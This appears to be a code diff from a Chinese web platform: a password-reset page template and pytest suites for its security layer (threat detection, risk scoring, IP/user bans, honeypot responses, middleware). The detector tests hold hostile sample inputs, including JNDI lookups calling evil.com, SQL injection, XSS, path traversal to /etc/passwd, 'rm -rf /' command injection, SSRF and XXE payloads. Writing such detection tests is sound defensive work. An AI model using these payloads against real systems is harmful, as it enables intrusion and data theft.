<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>重置密码 - 知识管理平台</title>
<style>
* {
margin: 0;
padding: 0;
box-sizing: border-box;
}
body {
font-family: 'Microsoft YaHei', Arial, sans-serif;
background: linear-gradient(135deg, #667eea 0%, #764ba2 100%);
min-height: 100vh;
display: flex;
align-items: center;
justify-content: center;
padding: 20px;
}
.card {
background: white;
border-radius: 15px;
box-shadow: 0 10px 40px rgba(0,0,0,0.2);
padding: 40px;
text-align: center;
max-width: 450px;
width: 100%;
}
.icon {
width: 80px;
height: 80px;
background: linear-gradient(135deg, #e74c3c, #c0392b);
border-radius: 50%;
display: flex;
align-items: center;
justify-content: center;
margin: 0 auto 25px;
}
.icon svg {
width: 40px;
height: 40px;
fill: white;
}
h1 {
color: #333;
font-size: 24px;
margin-bottom: 10px;
}
p {
color: #666;
font-size: 14px;
line-height: 1.6;
margin-bottom: 25px;
}
.form-group {
margin-bottom: 20px;
text-align: left;
}
.form-group label {
display: block;
margin-bottom: 8px;
color: #333;
font-weight: bold;
font-size: 14px;
}
.form-group input {
width: 100%;
padding: 12px 15px;
border: 2px solid #e0e0e0;
border-radius: 8px;
font-size: 14px;
transition: border-color 0.3s;
}
.form-group input:focus {
outline: none;
border-color: #667eea;
}
.form-group small {
color: #999;
font-size: 12px;
margin-top: 5px;
display: block;
}
.btn {
width: 100%;
padding: 14px;
background: linear-gradient(135deg, #667eea 0%, #764ba2 100%);
color: white;
border: none;
border-radius: 30px;
font-size: 16px;
font-weight: bold;
cursor: pointer;
transition: transform 0.2s, box-shadow 0.2s;
}
.btn:hover {
transform: translateY(-2px);
box-shadow: 0 5px 20px rgba(102, 126, 234, 0.4);
}
.btn:disabled {
background: #ccc;
cursor: not-allowed;
transform: none;
box-shadow: none;
}
.message {
padding: 12px 15px;
border-radius: 8px;
margin-bottom: 20px;
font-size: 14px;
display: none;
}
.message.error {
background: #ffe6e6;
color: #d63031;
border: 1px solid #ffcdd2;
}
.message.success {
background: #e6ffe6;
color: #27ae60;
border: 1px solid #c8e6c9;
}
.back-link {
margin-top: 20px;
}
.back-link a {
color: #667eea;
text-decoration: none;
font-size: 14px;
}
.back-link a:hover {
text-decoration: underline;
}
.expired {
display: none;
}
.expired .icon {
background: linear-gradient(135deg, #95a5a6, #7f8c8d);
}
@media (max-width: 480px) {
body { padding: 12px; }
.card { padding: 30px 20px; }
h1 { font-size: 20px; }
}
</style>
</head>
<body>
<div class="card" id="resetForm">
<div class="icon">
<svg viewBox="0 0 24 24">
<path d="M12.65 10C11.83 7.67 9.61 6 7 6c-3.31 0-6 2.69-6 6s2.69 6 6 6c2.61 0 4.83-1.67 5.65-4H17v4h4v-4h2v-4H12.65zM7 14c-1.1 0-2-.9-2-2s.9-2 2-2 2 .9 2 2-.9 2-2 2z"/>
</svg>
</div>
<h1>重置密码</h1>
<p>请输入您的新密码</p>
<div id="errorMessage" class="message error"></div>
<div id="successMessage" class="message success"></div>
<form onsubmit="handleResetPassword(event)">
<div class="form-group">
<label for="newPassword">新密码</label>
<input type="password" id="newPassword" placeholder="请输入新密码" required minlength="8">
<small>至少8位包含字母和数字</small>
</div>
<div class="form-group">
<label for="confirmPassword">确认密码</label>
<input type="password" id="confirmPassword" placeholder="请再次输入新密码" required>
</div>
<button type="submit" class="btn" id="submitBtn">确认重置</button>
</form>
<div class="back-link">
<a href="/login">返回登录</a>
</div>
</div>
<div class="card expired" id="expiredCard">
<div class="icon">
<svg viewBox="0 0 24 24">
<path d="M12 2C6.48 2 2 6.48 2 12s4.48 10 10 10 10-4.48 10-10S17.52 2 12 2zm1 15h-2v-2h2v2zm0-4h-2V7h2v6z"/>
</svg>
</div>
<h1>链接已失效</h1>
<p>{{ error_message }}</p>
<div class="back-link">
<a href="/login">返回登录</a>
</div>
</div>
<script>
const token = '{{ token }}';
const isValid = {{ 'true' if valid else 'false' }};
if (!isValid) {
document.getElementById('resetForm').style.display = 'none';
document.getElementById('expiredCard').style.display = 'block';
}
async function handleResetPassword(event) {
event.preventDefault();
const newPassword = document.getElementById('newPassword').value;
const confirmPassword = document.getElementById('confirmPassword').value;
const errorDiv = document.getElementById('errorMessage');
const successDiv = document.getElementById('successMessage');
const submitBtn = document.getElementById('submitBtn');
errorDiv.style.display = 'none';
successDiv.style.display = 'none';
// 验证密码
if (newPassword.length < 8) {
errorDiv.textContent = '密码长度至少8位';
errorDiv.style.display = 'block';
return;
}
if (!/[a-zA-Z]/.test(newPassword) || !/\d/.test(newPassword)) {
errorDiv.textContent = '密码必须包含字母和数字';
errorDiv.style.display = 'block';
return;
}
if (newPassword !== confirmPassword) {
errorDiv.textContent = '两次输入的密码不一致';
errorDiv.style.display = 'block';
return;
}
submitBtn.disabled = true;
submitBtn.textContent = '处理中...';
try {
const response = await fetch('/api/reset-password-confirm', {
method: 'POST',
headers: { 'Content-Type': 'application/json' },
body: JSON.stringify({ token, new_password: newPassword })
});
const data = await response.json();
if (response.ok) {
successDiv.textContent = '密码重置成功3秒后跳转到登录页面...';
successDiv.style.display = 'block';
setTimeout(() => {
window.location.href = '/login';
}, 3000);
} else {
errorDiv.textContent = data.error || '重置失败';
errorDiv.style.display = 'block';
submitBtn.disabled = false;
submitBtn.textContent = '确认重置';
}
} catch (error) {
errorDiv.textContent = '网络错误,请稍后重试';
errorDiv.style.display = 'block';
submitBtn.disabled = false;
submitBtn.textContent = '确认重置';
}
}
</script>
</body>
</html>

View File

@@ -0,0 +1,249 @@
from __future__ import annotations
from datetime import timedelta
import pytest
from flask import Flask
import db_pool
from db.schema import ensure_schema
from db.utils import get_cst_now
from security.blacklist import BlacklistManager
from security.risk_scorer import RiskScorer
@pytest.fixture()
def _test_db(tmp_path):
db_file = tmp_path / "admin_security_api_test.db"
old_pool = getattr(db_pool, "_pool", None)
try:
if old_pool is not None:
try:
old_pool.close_all()
except Exception:
pass
db_pool._pool = None
db_pool.init_pool(str(db_file), pool_size=1)
with db_pool.get_db() as conn:
ensure_schema(conn)
yield db_file
finally:
try:
if getattr(db_pool, "_pool", None) is not None:
db_pool._pool.close_all()
except Exception:
pass
db_pool._pool = old_pool
def _make_app() -> Flask:
from routes.admin_api.security import security_bp
app = Flask(__name__)
app.config.update(SECRET_KEY="test-secret", TESTING=True)
app.register_blueprint(security_bp)
return app
def _login_admin(client) -> None:
with client.session_transaction() as sess:
sess["admin_id"] = 1
sess["admin_username"] = "admin"
def _insert_threat_event(*, threat_type: str, score: int, ip: str, user_id: int | None, created_at: str, payload: str):
with db_pool.get_db() as conn:
cursor = conn.cursor()
cursor.execute(
"""
INSERT INTO threat_events (threat_type, score, ip, user_id, request_path, value_preview, created_at)
VALUES (?, ?, ?, ?, ?, ?, ?)
""",
(threat_type, int(score), ip, user_id, "/api/test", payload, created_at),
)
conn.commit()
def test_dashboard_requires_admin(_test_db):
app = _make_app()
client = app.test_client()
resp = client.get("/api/admin/security/dashboard")
assert resp.status_code == 403
assert resp.get_json() == {"error": "需要管理员权限"}
def test_dashboard_counts_and_payload_truncation(_test_db):
app = _make_app()
client = app.test_client()
_login_admin(client)
now = get_cst_now()
within_24h = now.strftime("%Y-%m-%d %H:%M:%S")
within_24h_2 = (now - timedelta(hours=1)).strftime("%Y-%m-%d %H:%M:%S")
older = (now - timedelta(hours=25)).strftime("%Y-%m-%d %H:%M:%S")
long_payload = "x" * 300
_insert_threat_event(
threat_type="sql_injection",
score=90,
ip="1.2.3.4",
user_id=10,
created_at=within_24h,
payload=long_payload,
)
_insert_threat_event(
threat_type="xss",
score=70,
ip="2.3.4.5",
user_id=11,
created_at=within_24h_2,
payload="short",
)
_insert_threat_event(
threat_type="path_traversal",
score=60,
ip="9.9.9.9",
user_id=None,
created_at=older,
payload="old",
)
manager = BlacklistManager()
manager.ban_ip("8.8.8.8", reason="manual", duration_hours=1, permanent=False)
manager._ban_user_internal(123, reason="manual", duration_hours=1, permanent=False)
resp = client.get("/api/admin/security/dashboard")
assert resp.status_code == 200
data = resp.get_json()
assert data["threat_events_24h"] == 2
assert data["banned_ip_count"] == 1
assert data["banned_user_count"] == 1
recent = data["recent_threat_events"]
assert isinstance(recent, list)
assert len(recent) == 3
payload_preview = recent[0]["value_preview"]
assert isinstance(payload_preview, str)
assert len(payload_preview) <= 200
assert payload_preview.endswith("...")
def test_threats_pagination_and_filters(_test_db):
app = _make_app()
client = app.test_client()
_login_admin(client)
now = get_cst_now()
t1 = (now - timedelta(minutes=1)).strftime("%Y-%m-%d %H:%M:%S")
t2 = (now - timedelta(minutes=2)).strftime("%Y-%m-%d %H:%M:%S")
t3 = (now - timedelta(minutes=3)).strftime("%Y-%m-%d %H:%M:%S")
_insert_threat_event(threat_type="sql_injection", score=90, ip="1.1.1.1", user_id=1, created_at=t1, payload="a")
_insert_threat_event(threat_type="xss", score=70, ip="2.2.2.2", user_id=2, created_at=t2, payload="b")
_insert_threat_event(threat_type="nested_expression", score=80, ip="3.3.3.3", user_id=3, created_at=t3, payload="c")
resp = client.get("/api/admin/security/threats?page=1&per_page=2")
assert resp.status_code == 200
data = resp.get_json()
assert data["total"] == 3
assert len(data["items"]) == 2
resp2 = client.get("/api/admin/security/threats?page=2&per_page=2")
assert resp2.status_code == 200
data2 = resp2.get_json()
assert data2["total"] == 3
assert len(data2["items"]) == 1
resp3 = client.get("/api/admin/security/threats?event_type=sql_injection")
assert resp3.status_code == 200
data3 = resp3.get_json()
assert data3["total"] == 1
assert data3["items"][0]["threat_type"] == "sql_injection"
resp4 = client.get("/api/admin/security/threats?severity=high")
assert resp4.status_code == 200
data4 = resp4.get_json()
assert data4["total"] == 2
assert {item["threat_type"] for item in data4["items"]} == {"sql_injection", "nested_expression"}
def test_ban_and_unban_ip(_test_db):
app = _make_app()
client = app.test_client()
_login_admin(client)
resp = client.post("/api/admin/security/ban-ip", json={"ip": "7.7.7.7", "reason": "test", "duration_hours": 1})
assert resp.status_code == 200
assert resp.get_json()["success"] is True
list_resp = client.get("/api/admin/security/banned-ips")
assert list_resp.status_code == 200
payload = list_resp.get_json()
assert payload["count"] == 1
assert payload["items"][0]["ip"] == "7.7.7.7"
resp2 = client.post("/api/admin/security/unban-ip", json={"ip": "7.7.7.7"})
assert resp2.status_code == 200
assert resp2.get_json()["success"] is True
list_resp2 = client.get("/api/admin/security/banned-ips")
assert list_resp2.status_code == 200
assert list_resp2.get_json()["count"] == 0
def test_risk_endpoints_and_cleanup(_test_db):
app = _make_app()
client = app.test_client()
_login_admin(client)
scorer = RiskScorer(auto_ban_enabled=False)
scorer.record_threat("4.4.4.4", 44, threat_type="xss", score=20, request_path="/", payload="<script>")
ip_resp = client.get("/api/admin/security/ip-risk/4.4.4.4")
assert ip_resp.status_code == 200
ip_data = ip_resp.get_json()
assert ip_data["risk_score"] == 20
assert len(ip_data["threat_history"]) >= 1
user_resp = client.get("/api/admin/security/user-risk/44")
assert user_resp.status_code == 200
user_data = user_resp.get_json()
assert user_data["risk_score"] == 20
assert len(user_data["threat_history"]) >= 1
# Prepare decaying scores and expired ban
old_ts = (get_cst_now() - timedelta(hours=2)).strftime("%Y-%m-%d %H:%M:%S")
with db_pool.get_db() as conn:
cursor = conn.cursor()
cursor.execute(
"""
INSERT INTO ip_risk_scores (ip, risk_score, last_seen, created_at, updated_at)
VALUES (?, 100, ?, ?, ?)
""",
("5.5.5.5", old_ts, old_ts, old_ts),
)
cursor.execute(
"""
INSERT INTO ip_blacklist (ip, reason, is_active, added_at, expires_at)
VALUES (?, ?, 1, ?, ?)
""",
("6.6.6.6", "expired", old_ts, old_ts),
)
conn.commit()
manager = BlacklistManager()
assert manager.is_ip_banned("6.6.6.6") is False # expired already
cleanup_resp = client.post("/api/admin/security/cleanup", json={})
assert cleanup_resp.status_code == 200
assert cleanup_resp.get_json()["success"] is True
# Score decayed by cleanup
assert RiskScorer().get_ip_score("5.5.5.5") == 81

View File

@@ -0,0 +1,74 @@
from __future__ import annotations
import queue
from browser_pool_worker import BrowserWorker
class _AlwaysFailEnsureWorker(BrowserWorker):
def __init__(self, *, worker_id: int, task_queue: queue.Queue):
super().__init__(worker_id=worker_id, task_queue=task_queue, pre_warm=False)
self.ensure_calls = 0
def _ensure_browser(self) -> bool: # noqa: D401 - matching base naming
self.ensure_calls += 1
if self.ensure_calls >= 2:
self.running = False
return False
def _close_browser(self):
self.browser_instance = None
def test_requeue_task_when_browser_unavailable():
task_queue: queue.Queue = queue.Queue()
callback_calls: list[tuple[object, object]] = []
def callback(result, error):
callback_calls.append((result, error))
task = {
"func": lambda *_args, **_kwargs: None,
"args": (),
"kwargs": {},
"callback": callback,
"retry_count": 0,
}
worker = _AlwaysFailEnsureWorker(worker_id=1, task_queue=task_queue)
worker.start()
task_queue.put(task)
worker.join(timeout=5)
assert worker.is_alive() is False
assert worker.ensure_calls == 2 # 本地最多尝试2次创建执行环境
assert callback_calls == [] # 第一次失败会重新入队,不应立即回调失败
requeued = task_queue.get_nowait()
assert requeued["retry_count"] == 1
def test_fail_task_after_second_assignment():
task_queue: queue.Queue = queue.Queue()
callback_calls: list[tuple[object, object]] = []
def callback(result, error):
callback_calls.append((result, error))
task = {
"func": lambda *_args, **_kwargs: None,
"args": (),
"kwargs": {},
"callback": callback,
"retry_count": 1, # 已重新分配过1次
}
worker = _AlwaysFailEnsureWorker(worker_id=1, task_queue=task_queue)
worker.start()
task_queue.put(task)
worker.join(timeout=5)
assert worker.is_alive() is False
assert callback_calls == [(None, "执行环境不可用")]
assert worker.total_tasks == 1
assert worker.failed_tasks == 1

View File

@@ -0,0 +1,63 @@
from __future__ import annotations
import uuid
from security import HoneypotResponder
def test_should_use_honeypot_threshold():
responder = HoneypotResponder()
assert responder.should_use_honeypot(79) is False
assert responder.should_use_honeypot(80) is True
assert responder.should_use_honeypot(100) is True
def test_generate_fake_response_email():
responder = HoneypotResponder()
resp = responder.generate_fake_response("/api/forgot-password")
assert resp["success"] is True
assert resp["message"] == "邮件已发送"
def test_generate_fake_response_register_contains_fake_uuid():
responder = HoneypotResponder()
resp = responder.generate_fake_response("/api/register")
assert resp["success"] is True
assert "user_id" in resp
uuid.UUID(resp["user_id"])
def test_generate_fake_response_login():
responder = HoneypotResponder()
resp = responder.generate_fake_response("/api/login")
assert resp == {"success": True}
def test_generate_fake_response_generic():
responder = HoneypotResponder()
resp = responder.generate_fake_response("/api/tasks/run")
assert resp["success"] is True
assert resp["message"] == "操作成功"
def test_delay_response_ranges():
responder = HoneypotResponder()
assert responder.delay_response(0) == 0
assert responder.delay_response(20) == 0
d = responder.delay_response(21)
assert 0.5 <= d <= 1.0
d = responder.delay_response(50)
assert 0.5 <= d <= 1.0
d = responder.delay_response(51)
assert 1.0 <= d <= 3.0
d = responder.delay_response(80)
assert 1.0 <= d <= 3.0
d = responder.delay_response(81)
assert 3.0 <= d <= 8.0
d = responder.delay_response(100)
assert 3.0 <= d <= 8.0

View File

@@ -0,0 +1,72 @@
from __future__ import annotations
import random
import security.response_handler as rh
from security import ResponseAction, ResponseHandler, ResponseStrategy
def test_get_strategy_banned_blocks():
handler = ResponseHandler(rng=random.Random(0))
strategy = handler.get_strategy(10, is_banned=True)
assert strategy.action == ResponseAction.BLOCK
assert strategy.delay_seconds == 0
assert strategy.message == "访问被拒绝"
def test_get_strategy_allow_levels():
handler = ResponseHandler(rng=random.Random(0))
s = handler.get_strategy(0)
assert s.action == ResponseAction.ALLOW
assert s.delay_seconds == 0
assert s.captcha_level == 1
s = handler.get_strategy(21)
assert s.action == ResponseAction.ALLOW
assert s.delay_seconds == 0
assert s.captcha_level == 2
def test_get_strategy_delay_ranges():
handler = ResponseHandler(rng=random.Random(0))
s = handler.get_strategy(41)
assert s.action == ResponseAction.DELAY
assert 1.0 <= s.delay_seconds <= 2.0
s = handler.get_strategy(61)
assert s.action == ResponseAction.DELAY
assert 2.0 <= s.delay_seconds <= 5.0
s = handler.get_strategy(81)
assert s.action == ResponseAction.HONEYPOT
assert 3.0 <= s.delay_seconds <= 8.0
def test_apply_delay_uses_time_sleep(monkeypatch):
handler = ResponseHandler(rng=random.Random(0))
strategy = ResponseStrategy(action=ResponseAction.DELAY, delay_seconds=1.234)
called = {"count": 0, "seconds": None}
def fake_sleep(seconds):
called["count"] += 1
called["seconds"] = seconds
monkeypatch.setattr(rh.time, "sleep", fake_sleep)
handler.apply_delay(strategy)
assert called["count"] == 1
assert called["seconds"] == 1.234
def test_get_captcha_requirement():
handler = ResponseHandler(rng=random.Random(0))
req = handler.get_captcha_requirement(ResponseStrategy(action=ResponseAction.ALLOW, captcha_level=2))
assert req == {"required": True, "level": 2}
req = handler.get_captcha_requirement(ResponseStrategy(action=ResponseAction.BLOCK, captcha_level=2))
assert req == {"required": False, "level": 2}

179
tests/test_risk_scorer.py Normal file
View File

@@ -0,0 +1,179 @@
from __future__ import annotations
from datetime import timedelta
import pytest
import db_pool
from db.schema import ensure_schema
from db.utils import get_cst_now
from security import constants as C
from security.blacklist import BlacklistManager
from security.risk_scorer import RiskScorer
@pytest.fixture()
def _test_db(tmp_path):
db_file = tmp_path / "risk_scorer_test.db"
old_pool = getattr(db_pool, "_pool", None)
try:
if old_pool is not None:
try:
old_pool.close_all()
except Exception:
pass
db_pool._pool = None
db_pool.init_pool(str(db_file), pool_size=1)
with db_pool.get_db() as conn:
ensure_schema(conn)
yield db_file
finally:
try:
if getattr(db_pool, "_pool", None) is not None:
db_pool._pool.close_all()
except Exception:
pass
db_pool._pool = old_pool
def test_record_threat_updates_scores_and_combined(_test_db):
manager = BlacklistManager()
scorer = RiskScorer(blacklist_manager=manager)
ip = "1.2.3.4"
user_id = 123
assert scorer.get_ip_score(ip) == 0
assert scorer.get_user_score(user_id) == 0
assert scorer.get_combined_score(ip, user_id) == 0
scorer.record_threat(ip, user_id, threat_type="sql_injection", score=30, request_path="/login", payload="x")
assert scorer.get_ip_score(ip) == 30
assert scorer.get_user_score(user_id) == 30
assert scorer.get_combined_score(ip, user_id) == 30
scorer.record_threat(ip, user_id, threat_type="sql_injection", score=80, request_path="/login", payload="y")
assert scorer.get_ip_score(ip) == 100
assert scorer.get_user_score(user_id) == 100
assert scorer.get_combined_score(ip, user_id) == 100
def test_auto_ban_on_score_100(_test_db):
manager = BlacklistManager()
scorer = RiskScorer(blacklist_manager=manager)
ip = "5.6.7.8"
user_id = 456
scorer.record_threat(ip, user_id, threat_type="sql_injection", score=100, request_path="/api", payload="boom")
assert manager.is_ip_banned(ip) is True
assert manager.is_user_banned(user_id) is True
with db_pool.get_db() as conn:
cursor = conn.cursor()
cursor.execute("SELECT expires_at FROM ip_blacklist WHERE ip = ?", (ip,))
row = cursor.fetchone()
assert row is not None
assert row["expires_at"] is not None
cursor.execute("SELECT expires_at FROM user_blacklist WHERE user_id = ?", (user_id,))
row = cursor.fetchone()
assert row is not None
assert row["expires_at"] is not None
def test_jndi_injection_permanent_ban(_test_db):
manager = BlacklistManager()
scorer = RiskScorer(blacklist_manager=manager)
ip = "9.9.9.9"
user_id = 999
scorer.record_threat(ip, user_id, threat_type=C.THREAT_TYPE_JNDI_INJECTION, score=100, request_path="/", payload="${jndi:ldap://x}")
assert manager.is_ip_banned(ip) is True
assert manager.is_user_banned(user_id) is True
with db_pool.get_db() as conn:
cursor = conn.cursor()
cursor.execute("SELECT expires_at FROM ip_blacklist WHERE ip = ?", (ip,))
row = cursor.fetchone()
assert row is not None
assert row["expires_at"] is None
cursor.execute("SELECT expires_at FROM user_blacklist WHERE user_id = ?", (user_id,))
row = cursor.fetchone()
assert row is not None
assert row["expires_at"] is None
def test_high_risk_three_times_permanent_ban(_test_db):
manager = BlacklistManager()
scorer = RiskScorer(blacklist_manager=manager, high_risk_threshold=80, high_risk_permanent_ban_count=3)
ip = "10.0.0.1"
user_id = 1
scorer.record_threat(ip, user_id, threat_type="nested_expression", score=80, request_path="/", payload="a")
scorer.record_threat(ip, user_id, threat_type="nested_expression", score=80, request_path="/", payload="b")
with db_pool.get_db() as conn:
cursor = conn.cursor()
cursor.execute("SELECT expires_at FROM ip_blacklist WHERE ip = ?", (ip,))
row = cursor.fetchone()
assert row is not None
assert row["expires_at"] is not None # score hits 100 => temporary ban first
scorer.record_threat(ip, user_id, threat_type="nested_expression", score=80, request_path="/", payload="c")
with db_pool.get_db() as conn:
cursor = conn.cursor()
cursor.execute("SELECT expires_at FROM ip_blacklist WHERE ip = ?", (ip,))
row = cursor.fetchone()
assert row is not None
assert row["expires_at"] is None # 3 high-risk threats => permanent
cursor.execute("SELECT expires_at FROM user_blacklist WHERE user_id = ?", (user_id,))
row = cursor.fetchone()
assert row is not None
assert row["expires_at"] is None
def test_decay_scores_hourly_10_percent(_test_db):
manager = BlacklistManager()
scorer = RiskScorer(blacklist_manager=manager)
ip = "3.3.3.3"
user_id = 11
old_ts = (get_cst_now() - timedelta(hours=2)).strftime("%Y-%m-%d %H:%M:%S")
with db_pool.get_db() as conn:
cursor = conn.cursor()
cursor.execute(
"""
INSERT INTO ip_risk_scores (ip, risk_score, last_seen, created_at, updated_at)
VALUES (?, 100, ?, ?, ?)
""",
(ip, old_ts, old_ts, old_ts),
)
cursor.execute(
"""
INSERT INTO user_risk_scores (user_id, risk_score, last_seen, created_at, updated_at)
VALUES (?, 100, ?, ?, ?)
""",
(user_id, old_ts, old_ts, old_ts),
)
conn.commit()
scorer.decay_scores()
assert scorer.get_ip_score(ip) == 81
assert scorer.get_user_score(user_id) == 81

View File

@@ -0,0 +1,155 @@
from __future__ import annotations
import pytest
from flask import Flask, g, jsonify
from flask_login import LoginManager
import db_pool
from db.schema import ensure_schema
from security import init_security_middleware
@pytest.fixture()
def _test_db(tmp_path):
db_file = tmp_path / "security_middleware_test.db"
old_pool = getattr(db_pool, "_pool", None)
try:
if old_pool is not None:
try:
old_pool.close_all()
except Exception:
pass
db_pool._pool = None
db_pool.init_pool(str(db_file), pool_size=1)
with db_pool.get_db() as conn:
ensure_schema(conn)
yield db_file
finally:
try:
if getattr(db_pool, "_pool", None) is not None:
db_pool._pool.close_all()
except Exception:
pass
db_pool._pool = old_pool
def _make_app(monkeypatch, _test_db, *, security_enabled: bool = True, honeypot_enabled: bool = True) -> Flask:
import security.middleware as sm
import security.response_handler as rh
# 避免测试因风控延迟而变慢
monkeypatch.setattr(rh.time, "sleep", lambda _seconds: None)
# 每个测试用例保持 handler/honeypot 的懒加载状态
sm.handler = None
sm.honeypot = None
app = Flask(__name__)
app.config.update(
SECRET_KEY="test-secret",
TESTING=True,
SECURITY_ENABLED=bool(security_enabled),
HONEYPOT_ENABLED=bool(honeypot_enabled),
SECURITY_LOG_LEVEL="CRITICAL", # 降低测试日志噪音
)
login_manager = LoginManager()
login_manager.init_app(app)
@login_manager.user_loader
def _load_user(_user_id: str):
return None
init_security_middleware(app)
return app
def _client_get(app: Flask, path: str, *, ip: str = "1.2.3.4"):
return app.test_client().get(path, environ_overrides={"REMOTE_ADDR": ip})
def test_middleware_blocks_banned_ip(_test_db, monkeypatch):
app = _make_app(monkeypatch, _test_db)
@app.get("/api/ping")
def _ping():
return jsonify({"ok": True})
import security.middleware as sm
sm.blacklist.ban_ip("1.2.3.4", reason="test", duration_hours=1, permanent=False)
resp = _client_get(app, "/api/ping", ip="1.2.3.4")
assert resp.status_code == 503
assert resp.get_json() == {"error": "服务暂时繁忙,请稍后重试"}
def test_middleware_skips_static_requests(_test_db, monkeypatch):
app = _make_app(monkeypatch, _test_db)
@app.get("/static/test")
def _static_test():
return "ok"
import security.middleware as sm
sm.blacklist.ban_ip("1.2.3.4", reason="test", duration_hours=1, permanent=False)
resp = _client_get(app, "/static/test", ip="1.2.3.4")
assert resp.status_code == 200
assert resp.get_data(as_text=True) == "ok"
def test_middleware_honeypot_short_circuits_side_effects(_test_db, monkeypatch):
app = _make_app(monkeypatch, _test_db, honeypot_enabled=True)
called = {"count": 0}
@app.get("/api/side-effect")
def _side_effect():
called["count"] += 1
return jsonify({"real": True})
resp = _client_get(app, "/api/side-effect?q=${${a}}", ip="9.9.9.9")
assert resp.status_code == 200
payload = resp.get_json()
assert isinstance(payload, dict)
assert payload.get("success") is True
assert called["count"] == 0
def test_middleware_fails_open_on_internal_errors(_test_db, monkeypatch):
app = _make_app(monkeypatch, _test_db)
@app.get("/api/ok")
def _ok():
return jsonify({"ok": True, "risk_score": getattr(g, "risk_score", None)})
import security.middleware as sm
def boom(*_args, **_kwargs):
raise RuntimeError("boom")
monkeypatch.setattr(sm.blacklist, "is_ip_banned", boom)
monkeypatch.setattr(sm.detector, "scan_input", boom)
resp = _client_get(app, "/api/ok", ip="2.2.2.2")
assert resp.status_code == 200
assert resp.get_json()["ok"] is True
def test_middleware_sets_request_context_fields(_test_db, monkeypatch):
app = _make_app(monkeypatch, _test_db)
@app.get("/api/context")
def _context():
strategy = getattr(g, "response_strategy", None)
action = getattr(getattr(strategy, "action", None), "value", None)
return jsonify({"risk_score": getattr(g, "risk_score", None), "action": action})
resp = _client_get(app, "/api/context", ip="8.8.8.8")
assert resp.status_code == 200
assert resp.get_json() == {"risk_score": 0, "action": "allow"}

View File

@@ -0,0 +1,96 @@
from flask import Flask, request
from security import constants as C
from security.threat_detector import ThreatDetector
def test_jndi_direct_scores_100():
detector = ThreatDetector()
results = detector.scan_input("${jndi:ldap://evil.com/a}", "q")
assert any(r.threat_type == C.THREAT_TYPE_JNDI_INJECTION and r.score == 100 for r in results)
def test_jndi_encoded_scores_100():
detector = ThreatDetector()
results = detector.scan_input("%24%7Bjndi%3Aldap%3A%2F%2Fevil.com%2Fa%7D", "q")
assert any(r.threat_type == C.THREAT_TYPE_JNDI_INJECTION and r.score == 100 for r in results)
def test_jndi_obfuscated_scores_100():
detector = ThreatDetector()
payload = "${${::-j}${::-n}${::-d}${::-i}:rmi://evil.com/a}"
results = detector.scan_input(payload, "q")
assert any(r.threat_type == C.THREAT_TYPE_JNDI_INJECTION and r.score == 100 for r in results)
def test_nested_expression_scores_80():
detector = ThreatDetector()
results = detector.scan_input("${${env:USER}}", "q")
assert any(r.threat_type == C.THREAT_TYPE_NESTED_EXPRESSION and r.score == 80 for r in results)
def test_sqli_union_select_scores_90():
detector = ThreatDetector()
results = detector.scan_input("UNION SELECT password FROM users", "q")
assert any(r.threat_type == C.THREAT_TYPE_SQL_INJECTION and r.score == 90 for r in results)
def test_sqli_or_1_eq_1_scores_90():
detector = ThreatDetector()
results = detector.scan_input("a' OR 1=1 --", "q")
assert any(r.threat_type == C.THREAT_TYPE_SQL_INJECTION and r.score == 90 for r in results)
def test_xss_scores_70():
detector = ThreatDetector()
results = detector.scan_input("<script>alert(1)</script>", "q")
assert any(r.threat_type == C.THREAT_TYPE_XSS and r.score == 70 for r in results)
def test_path_traversal_scores_60():
detector = ThreatDetector()
results = detector.scan_input("../../etc/passwd", "path")
assert any(r.threat_type == C.THREAT_TYPE_PATH_TRAVERSAL and r.score == 60 for r in results)
def test_command_injection_scores_85():
detector = ThreatDetector()
results = detector.scan_input("test; rm -rf /", "cmd")
assert any(r.threat_type == C.THREAT_TYPE_COMMAND_INJECTION and r.score == 85 for r in results)
def test_ssrf_scores_75():
detector = ThreatDetector()
results = detector.scan_input("http://127.0.0.1/admin", "url")
assert any(r.threat_type == C.THREAT_TYPE_SSRF and r.score == 75 for r in results)
def test_xxe_scores_85():
detector = ThreatDetector()
payload = """<?xml version="1.0"?>
<!DOCTYPE foo [
<!ENTITY xxe SYSTEM "file:///etc/passwd">
]>"""
results = detector.scan_input(payload, "xml")
assert any(r.threat_type == C.THREAT_TYPE_XXE and r.score == 85 for r in results)
def test_template_injection_scores_70():
detector = ThreatDetector()
results = detector.scan_input("Hello {{ 7*7 }}", "tpl")
assert any(r.threat_type == C.THREAT_TYPE_TEMPLATE_INJECTION and r.score == 70 for r in results)
def test_sensitive_path_probe_scores_40():
detector = ThreatDetector()
results = detector.scan_input("/.git/config", "path")
assert any(r.threat_type == C.THREAT_TYPE_SENSITIVE_PATH_PROBE and r.score == 40 for r in results)
def test_scan_request_picks_up_args():
app = Flask(__name__)
detector = ThreatDetector()
with app.test_request_context("/?q=${jndi:ldap://evil.com/a}"):
results = detector.scan_request(request)
assert any(r.field_name == "args.q" and r.threat_type == C.THREAT_TYPE_JNDI_INJECTION and r.score == 100 for r in results)